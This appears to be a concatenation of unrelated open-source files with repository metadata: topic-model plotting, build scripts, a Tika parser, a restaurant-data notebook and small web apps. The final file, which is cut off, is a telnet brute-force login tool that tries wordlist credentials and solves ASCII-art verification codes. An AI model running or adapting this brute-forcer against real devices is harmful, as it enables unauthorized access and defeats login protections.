data = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"..","..","data")
target = os.path.join(data, *args)
if not os.path.exists(target):
return []
return [ f for f in os.listdir(target)
if os.path.isfile(os.path.join(target,f)) ]
| gpl-3.0 | -2,016,188,181,290,425,600 | 31.9875 | 79 | 0.628268 | false | 3.600273 | false | false | false |
MaartenGr/BERTopic | bertopic/plotting/_topics_over_time.py | 1 | 3528 | import pandas as pd
from typing import List
import plotly.graph_objects as go
def visualize_topics_over_time(topic_model,
topics_over_time: pd.DataFrame,
top_n_topics: int = None,
topics: List[int] = None,
width: int = 1250,
height: int = 450) -> go.Figure:
""" Visualize topics over time
Arguments:
topic_model: A fitted BERTopic instance.
topics_over_time: The topics you would like to be visualized with the
corresponding topic representation
top_n_topics: To visualize the most frequent topics instead of all
topics: Select which topics you would like to be visualized
width: The width of the figure.
height: The height of the figure.
Returns:
A plotly.graph_objects.Figure including all traces
Usage:
To visualize the topics over time, simply run:
```python
topics_over_time = topic_model.topics_over_time(docs, topics, timestamps)
topic_model.visualize_topics_over_time(topics_over_time)
```
Or if you want to save the resulting figure:
```python
fig = topic_model.visualize_topics_over_time(topics_over_time)
fig.write_html("path/to/file.html")
```
<iframe src="../../tutorial/visualization/trump.html"
style="width:1000px; height: 680px; border: 0px;""></iframe>
"""
colors = ["#E69F00", "#56B4E9", "#009E73", "#F0E442", "#D55E00", "#0072B2", "#CC79A7"]
# Select topics
if topics:
selected_topics = topics
elif top_n_topics:
selected_topics = topic_model.get_topic_freq().head(top_n_topics + 1)[1:].Topic.values
else:
selected_topics = topic_model.get_topic_freq().Topic.values
# Prepare data
topic_names = {key: value[:40] + "..." if len(value) > 40 else value
for key, value in topic_model.topic_names.items()}
topics_over_time["Name"] = topics_over_time.Topic.map(topic_names)
data = topics_over_time.loc[topics_over_time.Topic.isin(selected_topics), :]
# Add traces
fig = go.Figure()
for index, topic in enumerate(data.Topic.unique()):
trace_data = data.loc[data.Topic == topic, :]
topic_name = trace_data.Name.values[0]
words = trace_data.Words.values
fig.add_trace(go.Scatter(x=trace_data.Timestamp, y=trace_data.Frequency,
mode='lines',
marker_color=colors[index % 7],
hoverinfo="text",
name=topic_name,
hovertext=[f'<b>Topic {topic}</b><br>Words: {word}' for word in words]))
# Styling of the visualization
fig.update_xaxes(showgrid=True)
fig.update_yaxes(showgrid=True)
fig.update_layout(
yaxis_title="Frequency",
title={
'text': "<b>Topics over Time",
'y': .95,
'x': 0.40,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(
size=22,
color="Black")
},
template="simple_white",
width=width,
height=height,
hoverlabel=dict(
bgcolor="white",
font_size=16,
font_family="Rockwell"
),
legend=dict(
title="<b>Global Topic Representation",
)
)
return fig
| mit | 3,429,931,196,606,199,000 | 34.28 | 105 | 0.553288 | false | 3.906977 | false | false | false |
tmolteno/python-necpp | necpp/setup.py | 1 | 2166 | #!/usr/bin/env python
"""
setup.py file for necpp Python module.
"""
from setuptools import setup, Extension
from glob import glob
import os
nec_sources = []
nec_sources.extend([fn for fn in glob('necpp_src/src/*.cpp')
if not os.path.basename(fn).endswith('_tb.cpp')
if not os.path.basename(fn).startswith('net_solve.cpp')
if not os.path.basename(fn).startswith('nec2cpp.cpp')
if not os.path.basename(fn).startswith('necDiff.cpp')])
nec_sources.extend(glob("necpp_wrap.c"))
nec_headers = []
nec_headers.extend(glob("necpp_src/src/*.h"))
nec_headers.extend(glob("necpp_src/config.h"))
# At the moment, the config.h file is needed, and this should be generated from the ./configure
# command in the parent directory. Use ./configure --without-lapack to avoid dependance on LAPACK
#
necpp_module = Extension('_necpp',
sources=nec_sources,
include_dirs=['necpp_src/src/', 'necpp_src/'],
depends=nec_headers,
define_macros=[('BUILD_PYTHON', '1')]
)
with open('README.md') as f:
readme = f.read()
setup (name = 'necpp',
version = '1.7.3.5',
author = "Tim Molteno",
author_email = "[email protected]",
url = "http://github.com/tmolteno/necpp",
keywords = "nec2 nec2++ antenna electromagnetism radio",
description = "Python Antenna Simulation Module (nec2++) C-style interface",
long_description=readme,
long_description_content_type="text/markdown",
include_package_data=True,
data_files=[('examples', ['necpp_src/example/test.py'])],
ext_modules = [necpp_module],
py_modules = ["necpp"],
license='GPLv2',
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Scientific/Engineering",
"Topic :: Communications :: Ham Radio",
"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
"Intended Audience :: Science/Research"]
)
| gpl-2.0 | -8,857,182,121,933,700,000 | 33.380952 | 97 | 0.656971 | false | 3.384375 | false | false | false |
chrismattmann/tika-python | tika/parser.py | 1 | 4869 | #!/usr/bin/env python
# encoding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .tika import parse1, callServer, ServerEndpoint
import os
import json
def from_file(filename, serverEndpoint=ServerEndpoint, service='all', xmlContent=False, headers=None, config_path=None, requestOptions={}):
'''
Parses a file for metadata and content
:param filename: path to file which needs to be parsed or binary file using open(path,'rb')
:param serverEndpoint: Server endpoint url
:param service: service requested from the tika server
Default is 'all', which results in recursive text content+metadata.
'meta' returns only metadata
'text' returns only content
:param xmlContent: Whether or not XML content be requested.
Default is 'False', which results in text content.
:param headers: Request headers to be sent to the tika reset server, should
be a dictionary. This is optional
:return: dictionary having 'metadata' and 'content' keys.
'content' has a str value and metadata has a dict type value.
'''
if not xmlContent:
output = parse1(service, filename, serverEndpoint, headers=headers, config_path=config_path, requestOptions=requestOptions)
else:
output = parse1(service, filename, serverEndpoint, services={'meta': '/meta', 'text': '/tika', 'all': '/rmeta/xml'},
headers=headers, config_path=config_path, requestOptions=requestOptions)
return _parse(output, service)
def from_buffer(string, serverEndpoint=ServerEndpoint, xmlContent=False, headers=None, config_path=None, requestOptions={}):
'''
Parses the content from buffer
:param string: Buffer value
:param serverEndpoint: Server endpoint. This is optional
:param xmlContent: Whether or not XML content be requested.
Default is 'False', which results in text content.
:param headers: Request headers to be sent to the tika reset server, should
be a dictionary. This is optional
:return:
'''
headers = headers or {}
headers.update({'Accept': 'application/json'})
if not xmlContent:
status, response = callServer('put', serverEndpoint, '/rmeta/text', string, headers, False, config_path=config_path, requestOptions=requestOptions)
else:
status, response = callServer('put', serverEndpoint, '/rmeta/xml', string, headers, False, config_path=config_path, requestOptions=requestOptions)
return _parse((status,response))
def _parse(output, service='all'):
'''
Parses response from Tika REST API server
:param output: output from Tika Server
:param service: service requested from the tika server
Default is 'all', which results in recursive text content+metadata.
'meta' returns only metadata
'text' returns only content
:return: a dictionary having 'metadata' and 'content' values
'''
parsed={'metadata': None, 'content': None}
if not output:
return parsed
parsed["status"] = output[0]
if output[1] == None or output[1] == "":
return parsed
if service == "text":
parsed["content"] = output[1]
return parsed
realJson = json.loads(output[1])
parsed["metadata"] = {}
if service == "meta":
for key in realJson:
parsed["metadata"][key] = realJson[key]
return parsed
content = ""
for js in realJson:
if "X-TIKA:content" in js:
content += js["X-TIKA:content"]
if content == "":
content = None
parsed["content"] = content
for js in realJson:
for n in js:
if n != "X-TIKA:content":
if n in parsed["metadata"]:
if not isinstance(parsed["metadata"][n], list):
parsed["metadata"][n] = [parsed["metadata"][n]]
parsed["metadata"][n].append(js[n])
else:
parsed["metadata"][n] = js[n]
return parsed
| apache-2.0 | 3,369,326,313,456,085,500 | 40.262712 | 155 | 0.648388 | false | 4.402351 | true | false | false |
wenduowang/git_home | python/MSBA/intro/HW2/HW2_wenduowang.py | 1 | 12556 |
# coding: utf-8
# In[1]:
from pandas import Series, DataFrame
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
get_ipython().magic(u'pylab inline')
# # NYC Restaurants
# ### Read in data from csv, and check column names to keep in mind.
# In[2]:
restaurants = pd.read_csv("NYC_Restaurants.csv", dtype=unicode)
for index, item in enumerate(restaurants.columns.values):
print index, item
# ## Question 1: Create a unique name for each restaurant
# 1. Select `DBA`, `BUILDING`, `STREET` and `ZIPCODE` columns as a dataframe
# 2. Apply `apply()` function on the selected dataframe, which takes in the series of the dataframe.
# + inside the `apply()` function, use placeholders to indicate that 4 series will be taken at the same time.
# + it is possible to select each column and concatenate them together, though looks not DRY.
# In[3]:
#use .apply() method to combine the 4 columns to get the unique restaurant name
restaurants["RESTAURANT"] = restaurants[["DBA", "BUILDING", "STREET", "ZIPCODE"]]. apply(lambda x: "{} {} {} {}".format(x[0], x[1], x[2], x[3]), axis=1)
#incase that the RESTAURANT names contain spaces or symbols, strip off them
restaurants["RESTAURANT"] = restaurants["RESTAURANT"].map(lambda y: y.strip())
print restaurants["RESTAURANT"][:10]
# ## Question 2: How many restaurants are included in the data?
# Since each `RESTAURANT` appears appears only once in `value_count()` series, therefore applying `len()` will return the number of restaurants in the whole dataset.
# In[4]:
print "There are", len(restaurants.drop_duplicates(subset="RESTAURANT")["RESTAURANT"].value_counts()), "restaurants in the data."
# ## Question 3: How many chains are there?
# "Chains" are brands having at least 2 different `RESTAURANT`. After `drop_duplicates(subset="RESTAURANT")`, extracting`value_count()` on `DBA` will give how many `RESTAURANT` each `DBA` has. Converting each value into logical with evaluation `value_count()>=2` and then summing up the how series will give the number of `True` records, which is the number of chains.
# In[5]:
num_chain = sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)
print "There are", num_chain, "chain restaurants."
# ## Question 4: Plot a bar graph of the top 20 most popular chains.
# "Popularity" is here understood as number of `RESAURANT` of each `DBA`.
# 1. Extract the chain `DBA`
# 2. Define a helper function `chain` to identify if a given `DBA` is a chain.
# 3. Use the helper function to make a mask to select the chain `DBA`.
# 4. Apply the mask to the whole dataframe, and drop duplicate `RESTAURANT`, the `value_counts()` will give the number of locations of each `DBA`
# In[6]:
chains = restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[: num_chain].index.values
def chain(restaurant):
return (restaurant in chains)
mask = restaurants["DBA"].map(chain)
restaurants[mask].drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[:20].plot(kind="bar")
# ## Question 5: What fraction of all restaurants are chains?
# To calculate the faction of chains among all restaurants, we use an inline mask on `DBA`(`True` if is chain). Summing up `True` values gives the number of chains. It is divided by the total number of unique `RESTAURANT` to get the fraction.
# In[7]:
print "The percentage of chain restaurants is",
print "{:.2%}".format(sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)/float(len(restaurants["RESTAURANT"].value_counts())))
# ## Question 6: Plot the number of non-chain restaurants in each boro.
# 1. In case "missing" is spelt differently, a helper function `lower_case` is defined to convert the string into lower case.
# 2. Use the `chain` helper function to make a mask selecting chains. Negative of this mask will return non-chains.
# 3. Use the `lower_case` function to select missing `BORO`.
# 4. Use the "negative" mask to select non-chains and remove duplicate `RESTAURANT`, and then remove missing `BORO`, `value_counts()` gives number of non-chains in each borough.
# In[8]:
def lower_case(X):
return X.lower()
mask_1 = restaurants["DBA"].map(chain)
mask_2 = restaurants["BORO"].map(lower_case) != "missing"
restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).plot(kind="bar")
# ## Question 7: Plot the fraction of non-chain restaurants in each boro.
# The goal is to calculate the ratio of $\frac{N_{non-chain}}{N_{total}}$ within each borough.
#
# This fraction can be done between two series-`value_counts()` of non-chains of `BORO` (not missing) and `value_counts()` of all unique `RESTAURANT` of `BORO`.
#
# Depending on which borough has the highest ratio, a message will pop out to compare if it is the same with the borough with the most non-chains.
# In[9]:
series_tmp_1 = restaurants[mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_2 = restaurants[-mask_1][mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_ratio = series_tmp_2/series_tmp_1
series_tmp_ratio.sort_values(ascending=False).plot(kind="bar")
print "The highest non-chain/total ratio is:", "{:0.2%} ({})".format(series_tmp_ratio.sort_values(ascending=False)[0], series_tmp_ratio.sort_values(ascending=False).index.values[0])
if series_tmp_ratio.sort_values(ascending=False).index.values[0] !=restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).index.values[0]:
print "It is not the same borough."
else:
print "It is the same borough."
# ## Question 8: Plot the popularity of cuisines.
# Drop duplicate `RESTAURANT` and plot on the top 20 of sorted `value_counts()` of `CUISINE DESCRIPTION.`
# In[10]:
restaurants.drop_duplicates(subset="RESTAURANT")["CUISINE DESCRIPTION"].value_counts() .sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 9: Plot the cuisines among restaurants which never got cited for violations.
# Here we used a mask to sift out the restaurants whose `VIOLATION CODE` is missing.
# In[18]:
non_clean_restaurants = restaurants[-restaurants["VIOLATION CODE"].isnull()]["RESTAURANT"].value_counts().index.values
def is_clean(restaurant, blacklist=non_clean_restaurants):
return restaurant not in blacklist
mask_clean = restaurants["RESTAURANT"].map(is_clean)
restaurants[mask_clean]["CUISINE DESCRIPTION"].value_counts().sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 10: What cuisines tend to be the “cleanest”?
# 1. Make a series of all cuisines with 20 or more serving records in non-duplicate restaurants.
# 2. Define a helper function to determine if a given cuisine is in the series above.
# 3. Make a mask for the most served cuisines.
# 4. Apply that mask and the "non violation" mask in Q9 to produce a `value_counts()` series, containing the non-violation records for those cuisines.
# 5. Apply the newly defined mask to the whole DataFrame and produce another `value_counts()` containing how many inspections were done for the most served cuisines.
# 6. Divide the two series and get a new series of the format $cuisine:\ \frac{N_{non-violation}}{N_{total\ inspection}}$.
# 7. Plot the first 10 elements.
# In[12]:
top_cuisine_series = restaurants.drop_duplicates(subset=["RESTAURANT","CUISINE DESCRIPTION"])["CUISINE DESCRIPTION"].value_counts()
def is_top_cuisine(cuisine):
return top_cuisine_series[cuisine]>=20
mask_3 = restaurants["VIOLATION CODE"].isnull()
mask_4 = restaurants["CUISINE DESCRIPTION"].map(is_top_cuisine)
series_tmp_3 = restaurants[mask_4][mask_3]["CUISINE DESCRIPTION"].value_counts()
series_tmp_4 = restaurants[mask_4]["CUISINE DESCRIPTION"].value_counts()
(series_tmp_3/series_tmp_4).sort_values(ascending=False)[:10].plot(kind="bar")
# ## Question 11: What are the most common violations in each borough?
# 1. Use `crosstab` to create a dataframe with `VIOLATION DESCRIPTION` as index, and `BORO` (without "Missing" boroughs) as columns. `dropna` is set `True` so `NaN` will not be recorded.
# 2. Every cell in the `crosstab` is the number of occurences of a violation in a certain borough. `idxmax()` method is applied to automatically retrieve the max occurence for each `BORO`.
# In[13]:
violation_boro_tab = pd.crosstab(
index=restaurants["VIOLATION DESCRIPTION"],
columns=restaurants[restaurants["BORO"]!="Missing"]["BORO"],
dropna=True
)
print "The most common violation in each borough is summarised below:"
violation_boro_tab.idxmax()
# ## Question 12: What are the most common violations per borough, after normalizing for the relative abundance of each violation?
# 1. Use `apply()` function to apply `lambda x: x.map(float)/violation_frequency_series, axis=0` on each column of the above `crosstab`. The resulting series gives _normalized_ violation frequency.
# + `float()` ensures the division returns fraction.
# + The denominator is a series of the `value_counts()` of all `VIOLATION DESCRIPTION`.
# In[14]:
violation_frequency_series = restaurants["VIOLATION DESCRIPTION"].value_counts()
violation_boro_norm_tab = violation_boro_tab.apply(lambda x: x.map(float)/violation_frequency_series, axis=0)
print "After normalization, the most common violation in each borough is summarised below:"
violation_boro_norm_tab.idxmax()
# ## Question 13: How many phone area codes correspond to a single zipcode?
# 1. Create a new column `AREA` to store the first 3 digits of `PHONE`, which is the area code.
# 2. Drop duplicate rows with the same combination of `AREA` and `ZIPCODE`.
# 3. By `value_counts()==1` each `AREA` with a single `ZIPCODE` will return `True`.
# 4. Sum up `True` values to return the total number of such area codes.
# In[15]:
restaurants["AREA"] = restaurants["PHONE"].map(lambda x: x[:3])
print "There are",
print sum(restaurants.drop_duplicates(subset=["AREA", "ZIPCODE"])["AREA"].value_counts() == 1),
print "area codes corresponding to only 1 zipcode"
# ## Question 14: Find common misspellings of street names
# 1. `map` `str.split()` function on `STREET` to breakdown the string into a list of words, and take the last word as `STREET TYPE`.
# 2. Take the remaining words and join them together as `STREET BASE`.
# 3. Concatenate `STREET BASE` and `STREET TYPE` together as `STREET BASE & ZIP`, spaced with empty space.
# 4. Create a new dataframe by `concat` the above 3 series. `axis=1` meaning concatenating horizontally.
# 5. Remove duplicate records from the new dataframe, where `STREET BASE` is not empty.
# 6. Merge the new dataframe with itself to get cross-matched `STREET TYPE`.
# 7. Only keep rows where the two `STREET TYPE` are different.
# 8. Make another `crosstab` on the merged dataframe with one `STREET TYPE` as index and the other as columns.
# 9. In the new `crosstab`, the occurences of alternative `STREET TYPE` are recorded in cells, whose max occurence can be obtained with `idxmax`.
# In[16]:
restaurants["STREET TYPE"] = restaurants["STREET"].map(lambda s: s.split()[-1])
restaurants["STREET BASE"] = restaurants["STREET"].map(lambda s: " ".join(s.split()[:-1]))
restaurants["STREET BASE & ZIP"] = restaurants["STREET BASE"].map(lambda s: s+" ") + restaurants["ZIPCODE"]
new_dataframe = pd.concat(
[restaurants["STREET BASE"], restaurants["STREET TYPE"], restaurants["STREET BASE & ZIP"]],
axis=1
)
new_dataframe = new_dataframe[new_dataframe["STREET BASE"].map(lambda s: len(s)>0)].drop_duplicates()
merged_new_dataframe = pd.merge(
new_dataframe,
new_dataframe,
left_on="STREET BASE & ZIP",
right_on="STREET BASE & ZIP",
suffixes=[" 1", " 2"]
)
merged_new_dataframe = merged_new_dataframe[merged_new_dataframe["STREET TYPE 1"] != merged_new_dataframe["STREET TYPE 2"]]
street_name = pd.crosstab(
index=merged_new_dataframe["STREET TYPE 1"],
columns=merged_new_dataframe["STREET TYPE 2"],
dropna=True
)
print "The most common alias for each of the following street type is listed"
street_name.idxmax()[
["AVE", "ST", "RD", "PL", "BOULEARD", "BOULEVARD"]
]
| gpl-3.0 | -8,672,267,729,537,924,000 | 47.651163 | 368 | 0.703155 | false | 3.277285 | false | false | false |
whtsky/Flask-WeRoBot | flask_werobot.py | 1 | 3402 | #coding=utf-8
"""
Flask-WeRoBot
---------------
Adds WeRoBot support to Flask.
:copyright: (c) 2013 by whtsky.
:license: BSD, see LICENSE for more details.
Links
`````
* `documentation <https://flask-werobot.readthedocs.org/>`_
"""
__version__ = '0.1.2'
from werobot.robot import BaseRoBot
from flask import Flask
class WeRoBot(BaseRoBot):
"""
给你的 Flask 应用添加 WeRoBot 支持。
你可以在实例化 WeRoBot 的时候传入一个 Flask App 添加支持: ::
app = Flask(__name__)
robot = WeRoBot(app)
或者也可以先实例化一个 WeRoBot ,然后通过 ``init_app`` 来给应用添加支持 ::
robot = WeRoBot()
def create_app():
app = Flask(__name__)
robot.init_app(app)
return app
"""
def __init__(self, app=None, endpoint='werobot', rule=None, *args, **kwargs):
super(WeRoBot, self).__init__(*args, **kwargs)
if app is not None:
self.init_app(app, endpoint=endpoint, rule=rule)
else:
self.app = None
def init_app(self, app, endpoint='werobot', rule=None):
"""
为一个应用添加 WeRoBot 支持。
如果你在实例化 ``WeRoBot`` 类的时候传入了一个 Flask App ,会自动调用本方法;
否则你需要手动调用 ``init_app`` 来为应用添加支持。
可以通过多次调用 ``init_app`` 并分别传入不同的 Flask App 来复用微信机器人。
:param app: 一个标准的 Flask App。
:param endpoint: WeRoBot 的 Endpoint 。默认为 ``werobot`` 。
你可以通过 url_for(endpoint) 来获取到 WeRoBot 的地址。
如果你想要在同一个应用中绑定多个 WeRoBot 机器人, 请使用不同的 endpoint .
:param rule:
WeRoBot 机器人的绑定地址。默认为 Flask App Config 中的 ``WEROBOT_ROLE``
"""
assert isinstance(app, Flask)
from werobot.utils import check_token
from werobot.parser import parse_user_msg
from werobot.reply import create_reply
self.app = app
config = app.config
token = self.token
if token is None:
token = config.setdefault('WEROBOT_TOKEN', 'none')
if not check_token(token):
raise AttributeError('%s is not a vailed WeChat Token.' % token)
if rule is None:
rule = config.setdefault('WEROBOT_ROLE', '/wechat')
self.token = token
from flask import request, make_response
def handler():
if not self.check_signature(
request.args.get('timestamp', ''),
request.args.get('nonce', ''),
request.args.get('signature', '')
):
return 'Invalid Request.'
if request.method == 'GET':
return request.args['echostr']
body = request.data
message = parse_user_msg(body)
reply = self.get_reply(message)
if not reply:
return ''
response = make_response(create_reply(reply, message=message))
response.headers['content_type'] = 'application/xml'
return response
app.add_url_rule(rule, endpoint=endpoint,
view_func=handler, methods=['GET', 'POST'])
| bsd-3-clause | 2,627,483,782,171,116,500 | 28.490196 | 81 | 0.560838 | false | 2.966469 | false | false | false |
crankycoder/oabutton-py | oabutton/oabutton/apps/bookmarklet/views.py | 1 | 2510 | from django.http import HttpResponse, HttpResponseServerError
from django.shortcuts import render
from django.core import serializers
from models import Event
try:
from simplejson import dumps
except:
from json import dumps
# TODO: we should really break up the view URLs here to separate the
# OAButton facing website from the bookmarklet URLs.
def homepage(req):
return render(req, 'bookmarklet/site/index.html')
def about(req):
return render(req, 'bookmarklet/site/about.html')
def show_stories(req):
# we only grab the 50 latest stories
# the original node code grabbed all stories which will kill your
# database
latest_stories = Event.objects.all().order_by('-pub_date')[:50]
count = Event.objects.count()
context = {'title': 'Stories', 'events': latest_stories, 'count': count}
return render(req, 'bookmarklet/site/stories.html', context)
def show_map(req):
# TODO: we need to make this smarter. Coallescing the lat/long
# data on a nightly basis and folding that down into clustered
# points would mean we throw less data down to the browser
count = Event.objects.count()
json_data = serializers.serialize("json", Event.objects.all())
context = {'title': 'Map', 'events': json_data, 'count': count }
return render(req, 'bookmarklet/site/map.html', context)
def get_json(req):
# Dump all data as JSON. This seems like a terrible idea when the
# dataset gets large.
json_data = serializers.serialize("json", Event.objects.all())
return HttpResponse(json_data, content_type="application/json")
def add(req):
# Display an entry page
# How does the DOI get in automatically? This seems really wrong.
# At the least, we need a test here to illustrate why this should
# work at all.
return render('sidebar/index.html', context={'url': req.query.url, 'doi': req.query.doi})
def add_post(req):
# Handle POST
event = Event()
# Where does the coords come from? This seems like it's using the
# HTML5 locationAPI. Need to dig around a bit
coords = req['coords'].split(',')
event.coords_lat = float(coords[0])
event.coords_lng = float(coords[1])
try:
event.save()
except Exception, e:
return HttpResponseServerError(e)
scholar_url = ''
if req.body['doi']:
scholar_url = 'http://scholar.google.com/scholar?cluster=' + 'http://dx.doi.org/' + req['doi']
return render('sidebar/success.html', {'scholar_url': scholar_url})
| mit | -3,371,336,796,552,659,500 | 34.352113 | 102 | 0.688048 | false | 3.616715 | false | false | false |
ryanbressler/GraphSpectrometer | plotpredDecomp.py | 1 | 3795 | """
plotjsondecomp.py
Script to make plots from json files calculated by fiedler.py for random forest
predictor files.
usage:
python plotjsondecomp.python fiedler.out.json
or often:
ls *.json | xargs --max-procs=10 -I FILE python plotjsondecomp.py FILE
THis script also updates the json file to include two additional fields: the value of the grad
component of the hodge decomposition and the rank produced by it:
The best visualization of a random forest predictor is given by r1 and hodge.
{"f1": the first fiedler vector,
"f2": (if caclulated) the second fideler vector
"d": the node degrees,
"r1": the rank of each node in the first fiedler vector
"r2": the rank of each node in the second fiedler vector
"iByn": the index of the nodes by the string used to represent them in
the input file
"nByi": the string used to represent nodes in the input file by their
index in the graph
"adj": the adjascancy list,
["hodge": the values of the gradient from hodge decomposition,
"hodgerank": the hodge rank]}
"""
import os
import sys
import json
import numpy
from numpy import asarray, eye, outer, inner, dot, vstack
from numpy.random import seed, rand
from numpy.linalg import norm
from scipy.sparse.linalg import cg, lsqr
import scipy.sparse
from pydec import d, delta, simplicial_complex, abstract_simplicial_complex
import fiedler
def plotjson(fn):
"""
plotjson: make plots from json output of fiedler.py
fn: the filename of the json file
"""
fo=open(fn)
data=json.load(fo)
fo.close()
if "adj" in data:
(A,adj,Npts) = fiedler.adj_mat(data["adj"])
#A = (A.T - A)/2
A=A.tocoo()
pos=A.data!=0
skew = numpy.column_stack((A.row[pos],A.col[pos],A.data[pos])).tolist()
# method from ranking driver.py
asc = abstract_simplicial_complex([numpy.column_stack((A.row[pos],A.col[pos])).tolist()])
B1 = asc.chain_complex()[1] # boundary matrix
rank = lsqr(B1.T, A.data[pos])[0] # solve least squares problem
# sc = simplicial_complex(([[el] for el in range(0,A.shape[0])],numpy.column_stack((A.row[pos],A.col[pos])).tolist()))
# omega = sc.get_cochain(1)
# omega.v[:] = A.data[pos]
# p = omega.k
# alpha = sc.get_cochain(p - 1)
#
# alpha.v = rank
# v = A.data[pos]-d(alpha).v
#
# cyclic_adj_list=numpy.column_stack((A.row[pos],A.col[pos],v)).tolist()
# div_adj_list=numpy.column_stack((A.row[pos],A.col[pos],d(alpha).v)).tolist()
data["hodge"]=list(rank)
data["hodgerank"]=list(numpy.argsort(numpy.argsort(rank)))
print "Adding hodge results to %s"%(os.path.abspath(fn))
fo = open(fn,"w")
json.dump(data,fo, indent=2)
fo.close()
# A.data = A.data * .25
# alist=fiedler.adj_list(A)
# fn=fn+".abstract"
# #fiedler.doPlots(numpy.array(data["f1"]),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+".all.v.grad.",widths=[24],heights=[6],vsdeg=False,nByi=data["nByi"],directed=False)
# try:
# print "Ploting ", fn
# fiedler.doPlots(numpy.argsort(numpy.argsort(numpy.array(data["f1"]))),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+"fied.rank.v.hodge",widths=[24],heights=[16],vsdeg=False,nByi=data["nByi"],directed=False,dorank=False)
# except ValueError:
# print "ValueError ploting ", fn
# print "A", A.shape,"A.data",A.data.shape,A.row.shape,A.col.shape,"pos",pos.shape,"B1.T.shape", B1.T.shape, "A.data[pos]", A.data[pos].shape, "rank", rank.shape, "numpy.array(data[\"f1\"])", numpy.array(data["f1"]).shape
# pass
def main():
fn=sys.argv[1]
plotjson(fn)
if __name__ == '__main__':
main() | bsd-3-clause | 6,372,562,606,690,363,000 | 33.825688 | 240 | 0.635046 | false | 3.048193 | false | false | false |
braian87b/BruteForceTelnetPy | brute_force_telnet_login.py | 1 | 6288 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import telnetlib
import sys
import os
import hashlib
cred_file = None
def get_hash_from_string(string):
hasher_engine = hashlib.md5()
hasher_engine.update(string)
return hasher_engine.hexdigest()
def port_scan(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect_ex((host, 23))
if connect == 0:
print "[+]\tPort 23: Open"
s.close()
return True
else:
print "[-]\tPort 23: Closed"
s.close()
return False
def save_last_index(last_index):
with open("last_index.txt", "w+") as f:
f.write(str(last_index))
def read_last_index():
try:
with open("last_index.txt", "r+") as f:
last_index = f.read()
except IOError as e:
last_index = 0
return int(last_index) if last_index else 0
def get_credentials(passwords_file):
last_index = read_last_index()
global cred_file
if not cred_file:
print "Opening...", passwords_file
cred_file = open(passwords_file, 'r')
for i in range(0, last_index):
cred_file.readline()
line = cred_file.readline()
user = ""
if ":" in line:
user_password = line.split(':')
user = user_password[0]
password = user_password[1]
else:
password = line
save_last_index(last_index + 1)
return user, password
def truncate(text, start=None, end=None):
if start:
text = text[text.find(start):]
if end:
text = text[:text.find(end) + len(end)]
return text
def truncate_including(text, start=None, end=None):
if start:
text = text[text.find(start) + len(start):]
if end:
text = text[:text.find(end)]
return text
def digit_ocr_verification_code(digit_text=""):
filename = "digit_" + get_hash_from_string(digit_text) + ".txt"
if os.path.exists(filename):
digit_value = open(filename, 'r').read()
else:
while True:
print "Unknown digit:"
print digit_text
digit_value = raw_input("Please enter digit (will be saved for later usage): ")
if len(digit_value) == 1:
break
with open(filename, 'w+') as f:
f.write(digit_value)
return digit_value
def ocr_verification_code(text=""):
"""
Function allows to read digits from text like
# ====================================================
# * * * * * * * * * * * * * * * *
# * * * * *
# * * * * * * * * * * * * *
# * * * * *
# * * * * *
# * * * * * * * * * * * * *
# ====================================================
"""
digits_spacing = 13
text = text.replace('\r\n', '\n')
text = truncate_including(text, '==\n', '\n==')
digits = [] # we store digits
for line in text.split('\n'): # we read digits line by line
if not digits:
digits = ["" for x in range(len(line) / digits_spacing)]
reading_line = line
line_parts = []
while True:
line_part = reading_line[:digits_spacing]
if line_part:
line_parts.append(reading_line[:digits_spacing].rstrip(' ')) # rstrip
reading_line = reading_line[digits_spacing:]
else:
break
for index, line_part in enumerate(line_parts):
digits[index] = digits[index] + line_part + '\n'
ocr = ""
for digit in digits:
ocr = ocr + digit_ocr_verification_code(digit)
return ocr
def brute_login(host, passwords_file):
tn = None # telnet connection
need_user = False # need's username
while True: # main while, we don't go out until Valid Cred. found
try:
if not tn:
asked_password_in_cnx = False
tn = telnetlib.Telnet(host)
# tn.debuglevel = 10
print "[-]\tPort 23: Connecting..."
while True: # while requesting input
response = tn.read_until(":", 1) # until input request
if "verification code:" in response:
verif_code = ocr_verification_code(response)
print "[+] Entering Verif. Code:\t" + verif_code
tn.write(verif_code + "\n")
elif "Login:" in response:
need_user = True
asked_password_in_cnx = False # Last time asked for password in this connection?
user, password = get_credentials(passwords_file)
print "[+] Trying user:\t" + user
tn.write(user + "\n")
elif "Password:" in response:
if asked_password_in_cnx and need_user:
tn.close() # we should try next pair user/password
break # TODO FIX: allow multiple password from same user
